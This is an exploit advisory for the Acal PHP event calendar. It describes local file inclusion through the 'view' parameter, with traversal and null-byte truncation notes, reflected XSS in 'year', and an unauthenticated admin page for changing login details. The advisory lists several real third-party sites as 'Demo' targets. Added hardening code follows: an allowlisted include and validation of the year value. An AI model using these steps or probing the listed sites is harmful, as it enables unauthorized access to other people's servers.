[+] Author: TUNISIAN CYBER
[+] Exploit Title: Acal LFI/XSS/Auth Bypass Vulnerabilities
[+] Category: WebApp
[+] Google Dork: Use your mind
[+] Tested on: Kali Linux
[+] Vendor: http://acalproj.sourceforge.net/
########################################################################################

+Description:
A web-based event calendar that does not require a database server. It is made to be easy to install and to run on just about any typical ISP's server with PHP installed.

+Exploit:
Acal suffers from LFI, XSS and authentication bypass vulnerabilities.

1/ LFI:
File(s): example.php, lines 24--30
Parameter: view

[PHP]
// DO NOT EDIT
if (!isset($_GET['view'])) {
    include $path . 'embed/' . $view . '.php';
} else {
    include $path . 'embed/' . $_GET['view'] . '.php';
}
[/PHP]

The value of the view parameter is concatenated straight into the include path, so directory traversal (../) walks out of embed/. Because the script appends '.php', arbitrary files such as /etc/passwd can only be read on PHP builds older than 5.3.4, where a %00 byte truncates the path; on newer builds the traversal is limited to other .php files on the server (configuration or include files, for example).

P.O.C:
127.0.0.1/calendar/embed/example/example.php?view=[LFI]

2/ XSS:
Parameter: year (reflected without encoding)
127.0.0.1/calendar/calendar.php?year=[XSS]
Screenshot: http://s13.postimg.org/u9bvlrg1i/www.jpg

3/ Auth Bypass:
The admin panel can be reached directly, without logging in, and the login details can be changed at:
127.0.0.1/calendar/admin/changelogin.php

Demo:
http://www.benifeade.com/i/calendar/admin/changelogin.php
http://www.diprove.unimi.it/calendar/admin/edit.php
http://tavernadeglieroi.altervista.org/calendar/admin/edit.php
http://www.davidcarrjr.com/CAL/calendar/admin/changelogin.php

./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members: DamaneDz UzunDz GEOIX
########################################################################################
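Hardened replacement for the include in the LFI section above. This is an added example, not Acal's own code; it assumes $path and $view are set earlier in example.php exactly as in the vulnerable snippet, and the allowlist of view names is a hypothetical stand-in for whatever files actually live in embed/.

```php
<?php
// Added example (not Acal's code): allowlist-based replacement for the
// 'view' include in embed/example/example.php.
// Assumptions: $path and $view are defined above, as in the original file;
// $allowed_views is hypothetical and must list the real files in embed/.

$allowed_views = array('month', 'week', 'day');

$requested = isset($_GET['view']) ? $_GET['view'] : $view;

// Accept only a plain identifier: no slashes, dots, NUL bytes or newlines
// (\z rather than $ so a trailing newline cannot slip past the check).
if (!is_string($requested) || !preg_match('/^[A-Za-z0-9_]+\z/', $requested)) {
    $requested = $view;
}

// The request value never reaches the filesystem unless it is on the list.
if (!in_array($requested, $allowed_views, true)) {
    header('HTTP/1.0 400 Bad Request');
    exit('Unknown view');
}

// Defence in depth: resolve the final path and confirm it is still inside embed/.
$base   = realpath($path . 'embed');
$target = realpath($path . 'embed/' . $requested . '.php');

if ($base === false || $target === false
    || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
    header('HTTP/1.0 400 Bad Request');
    exit('Unknown view');
}

include $target;
```

The allowlist is the actual control; the regular expression and the realpath comparison only make the failure mode obvious if the list is ever edited to contain something unexpected. Note that user input is compared against fixed names and is never used to build the path on its own.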
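For the reflected XSS in the year parameter, the following is an added example of how calendar.php could constrain the value before it is echoed. It is not Acal's code; the function name safe_year, the accepted year range and the output markup are assumptions for illustration.

```php
<?php
// Added example (not Acal's code): type-constrain the 'year' parameter,
// then encode at the output sink. safe_year and the 1970-2100 range are
// hypothetical choices for this illustration.

function safe_year($raw, $default) {
    // Only a four-digit string is accepted; anything else (markup, negative
    // numbers, arrays from year[]=...) falls back to the default.
    if (is_string($raw) && preg_match('/^\d{4}\z/', $raw)) {
        $y = (int)$raw;
        if ($y >= 1970 && $y <= 2100) {
            return $y;
        }
    }
    return $default;
}

$year = safe_year(isset($_GET['year']) ? $_GET['year'] : null, (int)date('Y'));

// $year is now an int and cannot carry markup. Encoding at the sink is kept
// anyway so the same pattern holds for parameters that stay strings.
echo '<h1>Calendar for ' . htmlspecialchars((string)$year, ENT_QUOTES, 'UTF-8') . "</h1>\n";
echo '<a href="calendar.php?year=' . urlencode((string)($year - 1)) . '">Previous</a> ';
echo '<a href="calendar.php?year=' . urlencode((string)($year + 1)) . '">Next</a>' . "\n";
```

Casting to int is what removes the injection point; htmlspecialchars with ENT_QUOTES covers the HTML body and attribute contexts, and urlencode covers the query-string context, which is the distinction that matters once a value is reused in more than one place on the page.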